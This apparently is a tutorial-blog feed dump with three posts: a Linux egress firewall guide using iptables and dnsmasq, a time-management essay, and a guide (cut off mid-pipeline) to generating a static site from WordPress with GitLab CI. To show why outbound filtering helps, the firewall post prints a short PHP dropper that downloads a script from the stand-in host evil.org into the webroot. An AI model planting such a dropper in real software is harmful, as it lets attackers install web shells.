Tutorials Archive - CraftCoders.app https://craftcoders.app/category/tutorials/ Jira and Confluence apps Wed, 14 Aug 2024 13:32:07 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.3 https://craftcoders.app/wp-content/uploads/2020/02/cropped-craftcoders-blue-logo-1-32x32.png Tutorials Archive - CraftCoders.app https://craftcoders.app/category/tutorials/ 32 32 Building a simple domain name based firewall for egress filtering on Linux with iptables and dnsmasq https://craftcoders.app/building-a-simple-domain-name-based-firewall-for-egress-filtering/ Mon, 16 Aug 2021 11:45:26 +0000 https://craftcoders.app/?p=1526 This blog post shows you how you can build a simple firewall on Linux system to only allow requests to a list of whitelisted domains using dnsmasq and iptables. Using the newer nftables that replaces iptables with the iptables compatibility layer (iptables-nft) will also work.

To follow this blog post you will need to have basic knowledge of networking and *NIX systems.

Background Story

Recently we had to secure a server that runs a WordPress based application that stores tons of sensitive data. As anybody working in IT security will tell you, WordPress is a nightmare when it comes to security. Luckily only a small part of the application needed to be exposed to the internet at all, so we could hide most of the application behind an authentication proxy with two factor authentication. However the application had to still process user input that was submitted over other channels (email, json import). So there were still avenues an exploit could reach our system without first going through the authentication proxy. Also of course exploits that target the authenticated client (XSS, CSRF) are still an issue.

So we asked ourself what else we cloud do to further mitigate the risk of an infection. One of the things we discussed was an egress filter that will only let requests pass through to a set of whitelisted domains.

Why do you want to do that?

The goal of most attacks on web applications is to execute code on the web server. In the context of PHP applications this usually means executing PHP code. There are thousands of bots out there that scan the web all day long for known vulnerabilities, exploit systems and install some sort of PHP malware on them. In the PHP world most of these scripts are referred to as web shells. They allow an attacker to steal data from your system, spread SPAM or participate in DDOS attacks. The thing is these scripts are often rather large, multiple kilobytes and larger. Most exploits on the web take place over url parameters, form submissions or file uploads. Besides for the last one they usually only allow very small payloads. This is especially true if you set a short URL limit. That’s why attackers will usually use an exploit to deploy a short virus dropper that downloads the actual malware from the internet. The code of a simple non obfuscated dropper could look like this:

<?php
$virus = file_get_contents('http://evil.org/virus.php');
file_put_contents('/var/www/html/virus.php', $virus);

This would try to download an evil PHP script from http://evil.org/virus.php and try to save that to the webroot. If the dropper succeeds the attacker could then access the remote shell at http://yourdomain.tld/virus.php.

Here is where output filtering in the firewall can help you. If the firewall blocks the connection to http://evil.org the dropper will fail and even though the attacker has successfully found an exploit in your web app there will be no damage. Of course, in many cases an attacker could still modify his attack so that it is feasible without downloading anything from the internet. But at this point most bots will probably fail and humans will decide that you are not worth the effort. Security is not absolute, despite what a lot of people in IT will tell you. There is no bike lock that can’t be easily defeated in a matter of minutes, but you still lock your bike, don’t you? And when the bike standing next to it is better and has a shittier lock a thief will probably take that bike before he/she takes yours. It is all about protecting your stuff to the level, that an attack is not economically sound.

An outbound filter can also help you in a few other scenarios. It can stop spammers from trying to connect to a SMTP server and it can stop exploits that trick PHP into opening an URL instead of a file or opening the wrong URL. And it can help to protect your private data from being sent to diagnostics websites or ad servers.

Think of an outbound filter as a tool of many to fight against attacks. It should however not be your only measurement and it will not save your ass in all situations.

Whitelisting ip addresses for outbound traffic with iptables & ipset

The Linux kernel has a build in firewall. We can configure it with the iptables command. Also the kernel allows us to maintain ip sets (lists of ip addresses and networks) to match against. We can configure the ip lists with the ipsets command. On Debian we can install both tools with:

# apt-get install iptables ipset

For this guide we will assume that the interface you want to monitor outgoing traffic on is called eth0. This should be the case on most servers but your interface may be called differently. You can check with ifconfig.

Warning: It is very important that you are careful with the commands listed below. If you do it wrong you can easily lock yourself out of your server by blocking ssh.

First lets make our life simple and disable IPv6 support on our server. Because we are lazy and we really don’t want to deal with IPv6 unless we have to  😉 On Debian we can do this with sysctl.

# echo 'net.ipv6.conf.all.disable_ipv6 = 1' > /etc/sysctl.d/70-disable-ipv6.conf 
# sysctl -p -f /etc/sysctl.d/70-disable-ipv6.con

Next let’s start the actual work by creating a new ip set called whitelist:

# ipset create whitelist hash:net

First we need to make sure that we only block outgoing traffic for newly created connections and not for connections that have been established from the outside like SSH:

# iptables -o eth0 -I OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

If your server gets configured via DHCP you will also want to allow all DHCP requests:

# iptables -o eth0 -I OUTPUT -p udp --dport 67:68 --sport 67:68 -j ACCEPT

Next lets start by allowing all trafic to private ip networks. You can off course decide for yourself if you want that. In our case we are on an AWS lightsail server and a lot of the servers we need to reach like the ntp time server are in the private ip range and we want to allow them by default. We only really care about blocking access to the internet:

# iptables -o eth0 -A OUTPUT -d 10.0.0.0/8 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 172.16.0.0/12 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 192.168.0.0/16 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 169.254.0.0/16 -j ACCEPT # link local

You may also want to allow traffic to the special broadcasting and multicasting ip addresses:

# iptables -o eth0 -A OUTPUT -d 255.255.255.255 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 224.0.0.22 -j ACCEPT

You should allow requests to your dns servers. For example to allow requests to the google nameservers (8.8.8.8, 8.8.8.4) add the following:

# iptables -o eth0 -A OUTPUT -d 8.8.8.8 -p udp --dport 53 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 8.8.8.4 -p udp --dport 53 -j ACCEPT

Now we want to allow all traffic to ip addresses that are on the whitelist that we have created above:

# iptables -o eth0 -A OUTPUT -m set --match-set whitelist dst -j ACCEPT

Now you can add all the ip addresses that you want to allow requests to. For example lets add the address 194.8.197.22 (mirror.netcologne.de) to the whitelist:

# ipset add whitelist 194.8.197.22

Finally lets block all outgoing traffic. Only execute this command if you are sure you have configured all the rules properly (you can check with iptables -L). If you did it wrong you may kill your ssh connection. The blocking rule needs to be the last rule in the list of rules:

# iptables -o eth0 -A OUTPUT -j DROP

There you go, lets hope you still got access to your server. If you don’t, a reboot should fix your issues. All the settings will get wiped out after a reboot. If you did everything correctly and you execute iptables -L -n to list all the rules, the OUTPUT chain should look something like this:

# iptables -L -n
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp spts:67:68 dpts:67:68
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            state RELATED,ESTABLISHED
ACCEPT     all  --  0.0.0.0/0            10.0.0.0/8
ACCEPT     all  --  0.0.0.0/0            172.16.0.0/12
ACCEPT     all  --  0.0.0.0/0            192.168.0.0/16
ACCEPT     all  --  0.0.0.0/0            169.254.0.0/16
ACCEPT     all  --  0.0.0.0/0            255.255.255.255
ACCEPT     all  --  0.0.0.0/0            224.0.0.22
ACCEPT     udp  --  0.0.0.0/0            8.8.8.8              udp dpt:53
ACCEPT     udp  --  0.0.0.0/0            8.8.8.4              udp dpt:53
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            match-set whitelist dst
DROP       all  --  0.0.0.0/0            0.0.0.0/0

Thats it now all outgoing traffic to ips that are not on the whitelist will get blocked by the firewall. All rules will however get reset after a reboot. To make the rules permanent you need to add the commands to a startup script or make the rules persistent using iptables-persistent (on newer systems netfilter-persistent) and ipset-persistent.

DNS Filtering

There is an issue however with our simple iptables filter. It can only work with ip addresses not domain names. In the WWW we seldom know the ip addresses of web services in advance. Instead, we connect to a domain name like example.org. The domain name gets resolved to an ip address by DNS and addresses may change over time. Even worse most services these days don’t even have fixed ip addresses. Therefore an ip address filter may not be a solution to your issue. Iptables and ipsets however cannot work with domain names. You can specify a domain name during rule creating but that will instantly get resolved to an ip address.

A simple alternative to an ip-based filter is DNS filtering. The idea being you simply block DNS requests for domains you don’t want to allow requests to.

We can configure a simple dns whitelist filter with dnsmasq. Dnsmasq is a software that can provide DNS and DHCP services to a local network. We will only use it as a dns server listening on 127.0.0.1 that forwards dns requests for whitelisted domains.

You can install dnsmasq on Debian with:

# apt-get install dnsmasq

After installing dnsamsq you will need to adjust the configuration file in /etc/dnsmasq.conf. For example to only allow traffic to mirror.netcologne.de and example.org the file could look like this:

no-resolv
server=/mirror.netcologne.de/8.8.8.8
server=/mirror.netcologne.de/8.8.8.4
server=/example.org/8.8.8.8
server=/example.org/8.8.8.4

Thsi will tell dnsmasq to not resolve dns queries in general (no-resolv) and to resolve the addressses mirror.netcologne.de and example.org using the dns servers 8.8.8.8 and 8.8.8.4 (google dns). After configuring you will need to restart dnsmasq:

# systemctl restart dnsmasq

You can test your dns server with the dig command:

$ dig A www.example.org @127.0.0.1
$ dig A google.com @127.0.0.1

If you have done everything correctly the first query for www.example.org should return an ip address but the second query for google.com should fail.

To make your system use dnsmasq as dns server you will need to add it to /etc/resolv.conf:

nameserver 127.0.0.1

If you use dhcp your /etc/resolv.conf will propably get overriden after a while or on restart. To prevent that you can configure dhcp to leave the /etc/resolv.conf file alone. On debian you can do this using the following commands:

# echo 'make_resolv_conf() { :; }' > /etc/dhcp/dhclient-enter-hooks.d/leave_my_resolv_conf_alone
# chmod 755 /etc/dhcp/dhclient-enter-hooks.d/leave_my_resolv_conf_alone

Thats it you should now have a working dns whitelist filter.

Combining dns filtering and ip filtering

There is an issue however with dns filtering, it’s easy to circumvent. All one has to do to bypass it is to specify the ip address directly. And lots of malware/attackers will do just that. This is why I wanted to combine both ideas. The idea being we will use dns filtering and add the ip addresses returned by our dns server to the whitelist ipset automatically. This way we can implement a simple domain name based egress filter that will block all other traffic.

Since my whitelist is realatively small (less than 100 entries) I decided to write a simple script that will just resolve all hosts in the whitelist, add the ips to the whitelist and write the ips to a host file that is read by dnsmasq. I then trigger this script by cron job on a short interval, so that the ip addresses in the host file are always relatively fresh. That way dnsmasq will always return an ip address that has been previously whitelisted. Since dns by design expects caching, cache times of a few minutes will not pose an issue.

Once a day at night another cronjob will scrub the ip whitelist from all entries, so that outdated ips that are no longer tied to the whitelisted dns names are removed from the ip whitelist.

I’ve put my code into an easy to use shell script. It includes all the code that you will need to configure iptables, dnsmasq and the cron jobs. You can find it here: https://gist.github.com/gellweiler/af81579fc121182dd157534359790d51.

To install it download it to /usr/local/sbin/configure-firewall.sh and make it executable:

# wget -O /usr/local/sbin/configure-firewall.sh "https://gist.githubusercontent.com/gellweiler/af81579fc121182dd157534359790d51/raw/d1906381462a81cea19c7f15a9d44843ff1ba27c/configure-firewall.sh"
# chmod 700 /usr/local/sbin/configure-firewall.sh

After installing the script you can modify the variables in the top  section of the script with your favorite editor to set the domain names that you want to allow and to configure your dns servers. By default the aws debian repos and the wordpress apis are allowed.

To install all necessary packages (iptables, dnsmasq, dig) on debian you can run:

# /usr/local/sbin/configure-firewall.sh install

To disable ipv6 support on your system you can run:

# /usr/local/sbin/configure-firewall.sh disable_ipv6

To start the firewall you can execute the following command:

# /usr/local/sbin/configure-firewall.sh startup

This will configure iptables and dnsmasq. After that you can test the firewall.

To refresh the ip addresses after you made changes to the list of dns names in the top of the script or to update outdated dns results you can run:

# /usr/local/sbin/configure-firewall.sh refresh_ips

If you are happy with the result you can make the changes permanent with:

# /usr/local/sbin/configure-firewall.sh configure_cronjob

This will create 3 cronjobs: one that will run on startup, one that will refresh the ips every 10 minutes and one that will flush the ip whitelist at 4 o’clock in the morning.

Since I’m using the script on an AWS lightsail server that has no recovery console I’ve added a delay of 90 seconds to the startup cron job. That means the firewall will only get activated 90 seconds past boot. That way if I ever mess up the firewall and lock myself out of SSH I can reboot the server using the web console and I have enough time to ssh into it and kill the script. It of course also means that the firewall will not run for a short time after booting. An acceptable risk for me since I will only restart the server in very rare instances.

Conclusion

Using iptables and dnsmasq we can hack together a simple dns based whitelist-based firewall for outgoing traffic. In this basic form only the A record is queried. The A record is used for most web services. If you rely on other records (for example the MX record for mail servers) you will have to adjust the script. Adding an egress filter can add some extra security to a web server. It is however not a silver bullet that will magically protect you against all exploits. Also if you run the firewall on the web server and an attacker gains root access to your machine he/she can simply disable the firewall.

 

]]>
Time Management: Doing Less lets you Achieve More https://craftcoders.app/time-management-doing-less-lets-you-achieve-more/ Mon, 14 Sep 2020 08:00:00 +0000 https://craftcoders.app/?p=1378 “There is surely nothing quite so useless as doing with great efficiency what should not be done at all.” – Peter F. Drucker [1]

Effectiveness and Efficiency

Do you know the difference between effectiveness and efficiency? Effectiveness is the relationship between a goal achieved and a goal set, whereas efficiency is the ratio of the achieved goal to the effort. Thus effectiveness is a measure of usefulness and efficiency is one of economy. This is where it gets interesting because the result of efficient working does not have to be following my set goals (or those of my company) and therefore effective at the same time. Moreover, it often happens that we do bullshit efficiently. Checking e-mail 30 times a day to develop an elaborate system of rules and sophisticated techniques to ensure that 30 of these brain farts are processed as quickly as possible is efficient but far from being effective [2]. We often assume that when people are busy, they work on important tasks, implying effectiveness. Unfortunately, this is often not true.

But why does this happen? Two quite clear situations cause this behavior in my opinion. The first and very rare situation is that there is nothing important to do. Now that we have to ask ourselves what to do next we decide more or less obviously, depending on whether I am at work or not, to do tasks/things that are not very effective. Taking a break or doing nothing is usually not an option because we hate not using time and are afraid of social disregard (e.g. by colleagues). Someone who takes a break while other work is called lazy faster then he*she likes, even if it is not guaranteed that the others work effectively. That’s why we prefer to do bullshit instead of a targeted break, at least at work. But as already mentioned this situation is quite rare in my opinion, because many people are looking for new challenges if there is nothing important to do. The second situation is that there are a few critical tasks to get closer to my (or the company) goals. Being busy is then used as an excuse to avoid these most unpleasant tasks. Effective work fails not because of the amount or complexity of tasks, but by distraction or working on unimportant things. There are thousands of useless things you can do (efficiently): Sort Outlook contacts, cleaning up the filing cabinet, write an unimportant report, and so on. Whereas it is difficult, for example, to call the Head of Department to say that something cannot be done as planned and that a new meeting with the customer is needed.

These considerations lead me to the following conclusion: It is much more important what you do than how you do it. Don’t get me wrong, efficiency is something very important. But you should consider it secondary in comparison to effectiveness. So now let’s have a look at the Pareto Law as it is a rule which helps us to identify important/critical tasks. 

Pareto’s 80/20 Law

Pareto is a rather well-known and controversial Economist. He became known mainly through the rule named after him: Pareto’s Law. This rule is explained quite simply: 80% of a result comes from 20% of the effort [3]. Depending on the context, you can find different variations of this, like

  • 80% of the consequences come from 20% of the causes,
  • 80% of the revenue comes from 20% of the products (and/or customers),
  • 80% of costs come from 20% of the purchases,

and so on. The exact ratio varies and you find examples from 70/30 to 99/1. Significant is the large gradient. Even though most people realize that this rule can’t apply to everything and is therefore discussed with good reason, Pareto makes a point here. Just from those already mentioned circumstances above, and a few more, we often tend to work ineffective. This creates an imbalance between effort and usefulness results. With this, the Pareto Rule pushes us to identify self-reflectively where we waste time and to find out what is important for our goals. So here you can try to answer the following questions for yourself:

  • What 20% causes 80% of my problems?
  • What 20% causes 80% of my useful outcomes?

or in a personal way:

  • What 20% causes 80% of my unhappiness?
  • Which 20% causes 80% of what makes me happy?

These questions can be used to identify critical tasks or circumstances and thus allow us to decide what we should do. Or as in most cases what we should let be, e.g. caring for a lot of customers which only generates a fraction of the revenue. Another simple question that helps us identify what we should do is the following: If you were only allowed to work two hours a day, what tasks would you do and what tasks would you avoid at all costs? This simple question helps to identify the critical tasks and leads us to the final topic: How to get shit done in time.

Parkinson’s Law

Time is wasted because there is so much of it [4]. As an employee, you are usually not free to choose how long you want to work each day. Most people have to work between 8-12 hours. While the time of work plays a role in physical labor, it behaves for most creative, constructive, and conceptual jobs like a servitude. As you are obliged to be in the office you choose to create activities to fill the time. Being at work for 8 hours does not mean that you are creative for 8 hours or being able to be creative that long. Also, don’t get me wrong on this, there are days when you can work very effectively for a long time, but often in the context of deadlines. And that’s what the Parkinson’s Law is about:

“Work expands so as to fill the time available for its completion” – C. Northcote Parkinson [5]

Or in other words: A task expands to the exact degree that time is available to complete it, not to the degree that it is actually complex [6]. If you had a day to deliver a project, the time pressure would force you to concentrate on your work and do only the most essential things possible. If you had 2 weeks for the same task, it would take you two weeks and you will probably have wasted much more time on unimportant subtasks. This does not mean that we can do everything if we set the deadline short enough, but that we work much more effectively if we set ourselves tight deadlines. 

Try it out

To sum it up in one sentence: Doing less lets you achieve more! With Pareto, you can identify your few critical tasks for your goals. And according to Parkinson’s Law, you should shorten the work time so that you stick to these critical tasks and do not inflate the goals unnecessarily. Try it out! Choose a personal goal or your current company task. Ask your self which the really important (sub-)tasks are (80/20 helps). Afterward, shorten your time to work on these tasks to a limit (e.g. 2 hours a day) and set you a tight deadline to deliver. For the deadline, it is important that you feel uncomfortable or it seems impossible. The goal is not to have everything done by tomorrow in magical ways, but to increase the focus. Look after the deadline and see what you have achieved. Probably much more in less time. 

One last note: In my opinion, these rules do not serve to maximize the time gained for other work, but to free it up. We should try to create the important in little time and use the remaining time for our interests and private life to have a healthy balance. The goal is not having 4 slots of 2-hour pure effectiveness but having one or two and not wasting the rest of the (work) time. 

Key Takeaways

  • Being busy is not equal to being effective. 
  • Being efficient does not imply being effective.
  • We use busyness to postpone critical and unpleasant tasks.
  • We use busyness to avoid apparent “time-loss” and social disregard.
  • It is much more important what you do than how you do it.
  • Pareto gives you the possibility to identify what you should do.
  • Parkinson’s Law lets you stay focussed on the important things.
  • Doing less let you achieve more.

Sources

[1] Peter Ferdinand Drucker: Managing for Business Effectiveness. Harvard Business Review. 3, May/June, 1963, P. 53–60 (hbr.org opened 04/09/2020).

[2] Timothy Ferris, 4 Hour Work Week, Page 69

[3] Bunkley, Nick (March 3, 2008). “Joseph Juran, 103, Pioneer in Quality Control, Dies”The New York Times. (opened 04/09/2020)

[4] Timothy Ferris, 4 Hour Work Week, Page 75

[5] C. Northcote Parkinson, Parkinson’s Law, The Economist. 177, No. 5856, 19. November 1955, P. 635–637.

[6] M. Mohrmann: Bauvorhaben mithilfe von Lean Projektmanagement neu denken. 4. Auflage. BoD, 2011, ISBN 978-3-8391-4949-2, P. 55.

]]>
WordPress without the security hassles – using GitLab CI/CD to automate transforming WordPress into a static website https://craftcoders.app/wordpress-vs-static-web-pages-the-best-of-both-worlds/ Sun, 29 Mar 2020 18:02:07 +0000 https://craftcoders.app/?p=1161 Read More]]> Recently we launched our new company website (craftcoders.app). It’s a simple website that showcases us and our work and describes the kind of services that we provide to customers. It requires no dynamic features except for the contact form.

We decided to build our website with WordPress, but to automatically generate a static copy of it and serve that to visitors. We’re using Gitlab CI/CD as automation tool. This guide will explain how you can setup your own pipeline to generate a static website from a WordPress site on a regular schedule or manually. But first we’ll have a detailed look at the pros and cons of WordPress and static websites in the next section. Feel free to skip over it, if this is not of interest to you.

The ups and downs of WordPress and static websites

At craft-coders we value efficiency, and we try to choose the right tool for the job. WordPress is the leading CMS for small websites. It’s easy to set up and deploy. At the time of writing ~35% of all websites on the internet are built with it. Because of its popularity there are tons of useful plugins and great themes available. So that you can build good-looking and feature rich websites really quickly.

But WordPress has its downsides. Mainly it sucks at security. So famously, that ~1/5 of the Wikipedia article on it focuses on its vulnerabilities. The plugin market for WordPress does not provide any quality checks and if you look at the code base of most plugins (even some popular ones), any self-respecting programmer will scream out in agony.

Because of this we are very much against using WordPress for more than simple representational websites and blogs. Basically if your website is built on WordPress you must expect getting hacked. It’s therefore crucial that your WordPress installation is running on a server that isn’t storing any sensitive information about you or your customers and that you use passwords that are used nowhere else. If people really need to log into your website, then at best you use an external authentication service, so that no information about passwords is stored on your server.

Still, even if there is nothing of value to gain for a potential attacker, so that a targeted attack against your website is very unlikely and getting hacked is more a nuisance than an actual problem, you still need to take basic precautions. Due to the popularity of WordPress there are a lot of bots out there that just scan the web for known vulnerabilities. They try to hack as many web pages as possible and use them to spread SPAM emails, viruses and propaganda, or use your server to mine Bitcoins.

The most important thing that you must do to protect yourself from bots is to keep your WordPress installation and its plugins updated at all times. This can be very annoying because updates may break things. And for most small websites the goal is often to deploy and forget. You don’t want to spend time fostering your site, but just want it to continue to function as expected and be done with it. The ultimate goal of every person in operations is, to go unnoticed. If you have an admin that is constantly running around fixing stuff he/she is probably not doing a good job, or he/she has to compensate for the mistakes of the developers. You want things to work without the need of thinking about it.

Even though WordPress is the nightmare of every admin, in contrast to that, static web pages are the dream of every person working in operations. They’re super easy to deploy, work super fast, can be kept in RAM and requests can be distributed between as many servers as you like. Because there is no code running on the server involved, they are basically unhackable. Provided of course that your webserver is secure, but since you can just rent a managed server this isn’t really an issue that you need to concern yourself with. Yes, attacks running in the clients browser exploiting flaws in JavaScript or CSS are still feasible, but since a truly static website by definition has no valuable cookies or private information to steal, there is little to be gained by performing an attack in this manner (talking to authenticated REST-Service can change that picture of course).

There are a few good static site generators out there, but as of now no one of them provides an easy-to-use GUI and as many plugins/themes as WordPress. If your goal is to build a simple website fast, WordPress should still be your first choice. Also if you decide to go with a static site generator there is no going back, your site will forever be static. Of course, you’re always free to use JavaScript to talk to REST-services and that is a good design choice, so this sounds more dramatic than it actually is.

To sum it up WordPress is great for editors and site-builders but it sucks in operations. In contrast, static web pages are hard to use by editors and usually require more development effort than WordPress, but they are great in operations. This is a classic development vs. operations issue.

Using WordPress to generate a static web page

What if you could have both? Why not have a private non-accessible installation of WordPress and from that generate a static copy. Then you can deploy that copy to a public accessible web space. That way you have the best of both worlds. Of course you deprive yourself of the dynamic features of WordPress, so no comment fields and no login sections, but if you don’t need any of that, this is a perfect solution for you. And if your requirements ever change you can always replace your static copy with the real thing and go on with it.

This is the basic idea. The first thing we tried out was the WP2Static plugin which aims at solving this issue, but we couldn’t get it running. We then decided to build our own solution using our favorite automation tool GitLab CI/CD. We used gitlab.com, and at the moment they are offering 2000 free ci minutes to every customer, which is a really sweet deal. But any ci-tool should do. You should not have many issues porting this guide to Jenkins or any other tool that allows to execute bash scripts. Also, we’re assuming you are using Apache (with mod_rewrite) as web server and that you can use .htaccess files. But porting this concept to other web servers shouldn’t be too difficult.

You can find and fork the complete sample code here: https://gitlab.com/sgellweiler/demo-wordpress-static-copy.

Here is the plan in detail. We’re going to use the same domain and web space to host both the private WordPress installation and the public accessible static copy. We’re going to install WordPress to a sub directory, that we will protect with basic auth using a .htaccess file. This is the directory that all your editors, admins and developers will access. The Gitlab job will crawl this installation using Wget and deploy the static copy via ssh+rsync into the directory /static on the web space. Then will use the .htaccess file in the root directory to rewrite all requests to the root path into the static directory. You can configure the gitlab job to run every day, hour or only manually depending on your needs.

To follow this guide you should have access to a *NIX shell and have the basic Apache tools (htpasswd), ssh tools (ssh-keygen, ssh-keyscan), find, sed and GNU Wget installed. Some distros ship with a minimal Wget installed, so make sure that you have the feature rich version of Wget installed (wget –version).

Setting up the web space

First install WordPress into a sub directory. For this guide I’m going with wp_2789218. You can go along with this name or choose your own, you should use a unique name tough, a string that you will use nowhere else. Best you add a few random generated chars in there. We’re not doing this for security but to make search+replace for urls easier in the next step. If you go with your own folder name remember to replace all occurrences of wp_2789218 in this guide with your folder name. We’ll also add a catchy alias /wp, for you and your coworkers to remember, so don’t worry too much about the cryptic name.

Next we create a directory to store our static copy. We’ll just name that static/ and for now we’ll just add an index.html with <h1>Hello World</h1> in there.

Let’s configure Apache to password protect our WordPress installation and to redirect request to /static. First generate a .htpasswd file with user+password at the root-level (or at another place) of your web space using:

htpasswd -c /home/pwww/.htpasswd yourusername

Next create a .htaccess on the root level with the following. You need to reference the .htpasswd file with an absolute path in the AuthUserFile:

RewriteEngine On
RewriteBase /

# Setup basic auth
AuthUserFile /var/www/httpdocs/.htpasswd
AuthType Basic
AuthName "Only for trusted employees"

# Require a password for the wp installation.
<RequireAny>
    Require expr %{REQUEST_URI} !~ m#^/wp_2789218#
    Require valid-user
</RequireAny>

# Add an easy to remember alias for the wp installation.
RewriteRule ^wp/(.*) wp_2789218/$1 [R=302,L]
RewriteRule ^wp$ wp_2789218/ [R=302,L]

# Rewrite all request to the static directory.
# Except for requests to the wp installation.
RewriteCond %{REQUEST_URI} !^/static.*
RewriteCond %{REQUEST_URI} !^/wp_2789218.*
RewriteRule ^(.*)$ static/$1 [L]

And that’s it for the server config part. If you go to your.domain.tld then you should see the Hello World from the index.html in the static directory. If you go to your.domain.tld/wp you should get redirected to your WordPress installation and be forced to enter a password.

Generating a static copy of a website

To make a static copy of your website you need a crawler that will start at your start page, follow all links to sub pages and download them as html including all CSS and JavaScript. We tried out several tools and the one that performed the best by far is the good old GNU Wget. It will reliably download all HTML, CSS, JS and IMG resources. But it will not execute JavaScript and therefore fail to detect links generated through JavaScript. In this case you might run into problems. However, most simple WordPress sites should be fine from the get go.

Let’s have a look at the Wget cmd we will use to generate a static copy of our WordPress site:

wget \
    -e robots=off \
    --recursive \
    -l inf \
    --page-requisites \
    --convert-links \
    --restrict-file-names=windows \
    --trust-server-names \
    --adjust-extension \
    --no-host-directories \
    --http-user="${HTTP_USER}" \
    --http-password="${HTTP_PASSWORD}" \
    "https://yourdomain.tld/wp_2789218/" \
    "https://yourdomain.tld/wp_2789218/robots.txt"

Here is an explanation of all the options in use:

  • –e robots=off
    Ignore instructions in the robots.txt.
    This is fine since we’re crawling our own website.
  • –recursive
    Follow links to sub directories.
  • -l inf
    Sets the recursion level depth to infinite.
  • –page-requisites
    Download stuff like CSS, JS, images, etc.
  • –convert-links
    Change absolute links to relative links.
  • –restrict-file-names=windows
    Change filenames to be compatible with (old) Windows. This is a useful option even if you’re not running on Windows or you will get really ugly names that can cause issues with Apache.
  • –trust-server-names
    Uses the filenames of redirects instead of the source url.
  • –no-host-directories
    Download files directly into wp_2789218 and not into yourdomain.tld.
  • –http-user
    The username used for basic auth to access the wp installation. As defined in your .htpasswd.
  • –http-password
    The password used for basic auth to access the wp installation. As defined in your .htpasswd.
  • “https://yourdomain.tld/wp_2789218/” “https://yourdomain.tld/wp_2789218/robots.txt”
    Lists of urls to download. We set this to the start page, Wget will recursively follow all links from there.
    We also copy the robots.txt along.

This will generate a static copy of your WordPress installation in wp_2789218. You can test if the crawling worked by opening the index.html in wp_2789218 with a browser.

Wget will try to rewrite urls in HTML and css, but for meta-tags, inside of JavaScript and in other places will fail to do so. This is where the unique name of our directory comes into play. Because we named it wp_2789218 and not wordpress, we can now safely search and replace through all files in the dump, and replace every occurrence of wp_2789218/, wp_2789218\/, wp_2789218%2F and wp_2789218 with an empty string (“”) so that the links will be correct again in all places. We will use find+sed for that.

Here is the mac OSX variant of that:

LC_ALL=C find wp_2789218 -type f -exec sed -E -i '' 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;

And here is the same for Linux with GNU sed:

find wp_2789218/ -type f -exec sed -i -E 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;

To save you the headache (\\\/|%2F|\/)? will match /, \/, %2F and empty string (“”).

Deploying the static copy to a web space

Now that we have generated a static copy of our website, we want to deploy it to /static on the web space. You can do this over rsync+ssh, if you have ssh access to your server.

The command to do so looks like this:

rsync -avh --delete --checksum wp_2789218 "webspaceuser@yourdomain.tld:static"

Remember to adjust the user, domain and path to the directory in webspaceuser@yourdomain.tld:static to your needs.

For our automated deployment with Gitlab, you should create a new private/public ssh keypair using:

ssh-keygen -m PEM -N "" -C "Deploymentkey for yourdomain.tld" -f deploy

This will create deploy and deploy.pub files in your current directory. Copy the contents of deploy.pub to ~/.ssh/authorized_keys on your remote server to allow ssh-ing with it to your server. You can use this one-liner for that:

cat deploy.pub | ssh webspaceuser@yourdomain.tld -- 'mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat - >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys'

Next test, that you have set up everything correctly by ssh-ing with the new key to your web space:

ssh -i deploy webspaceuser@yourdomain.tld

For Gitlab you will need the signature of your remote ssh server. You can generate it with ssh-keyscan. Copy the output of that, because you will need it in the next step:

ssh-keyscan yourdomain.tld

Putting it all together

Now that we have established all the basics it’s time to put it all together in one gitlab-ci.yml file. But first we need to configure a few variables. On your Gitlab project go to Settings → CI/CD → Variables and create the following variables:

  • $SSH_ID_RSA
    This is the private key that will be used for rsync to upload the static dir. Put the contents of the deploy file that you created in the step before, in here.
    This should be of type File and state Protected.
  • $SSH_ID_RSA_PUB
    This is the public key that will be used for rsync to upload the static dir. Put the contents of the deploy.pub file that you created in the step before, in here.
    This should be of type File.
  • $SSH_KNOWN_HOSTS
    The known host file contains the signature of your remote host.
    This is the output that you generated with ssh-keyscan.
    This should be of type File.
  • $RSYNC_REMOTE
    Example: webspaceuser@yourdomain.tld:static
    The rsync remote to upload the static copy to. This is in the scheme of user@host:directory.
  • $WORDPRESS_URL
    The url to your wordpress installation. This is the starting point for wget.
    This should be of type Variable.
  • $HTTP_USER
    The user used by wget to access your WordPress installation using basic auth. This is the user that you put in your .htpasswd file.
    This should be of type Variable.
  • $HTTP_PASSWORD
    The password for HTTP_USER used by wget to access your WordPress installation using basic auth.
    This should be of type Variable, state Protected and Masked.

Our Gitlab pipeline will have two phases for now: crawl and deploy. They are going to run the commands that we discussed in the previous sections in different docker containers. This is the .gitlabci.yml:

stages:
    - crawl
    - deploy

before_script:
    - echo "[INFO] setup credentials for ssh"
    - mkdir ~/.ssh
    - cp "${SSH_ID_RSA}" ~/.ssh/id_rsa
    - cp "${SSH_ID_RSA_PUB}" ~/.ssh/id_rsa.pub
    - cp "${SSH_KNOWN_HOSTS}" ~/.ssh/known_hosts
    - chmod 600 ~/.ssh ~/.ssh/id_rsa ~/.ssh/id_rsa.pub

crawl:
    image:
        name: cirrusci/wget@sha256:3030b225419dc665e28fa2d9ad26f66d45c1cdcf270ffea7b8a80b36281e805a
        entrypoint: [""]
    stage: crawl

    script:
        - rm -rf wp_2789218 static
        - |
            wget \
                -e robots=off \
                --recursive \
                --page-requisites \
                --convert-links \
                --restrict-file-names=windows \
                --http-user="${HTTP_USER}" \
                --http-password="${HTTP_PASSWORD}" \
                --no-host-directories \
                --trust-server-names \
                --adjust-extension \
                --content-on-error \
                "${WORDPRESS_URL}/" \
                "${WORDPRESS_URL}/robots.txt"

        - find wp_2789218/ -type f -exec sed -i -E 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;
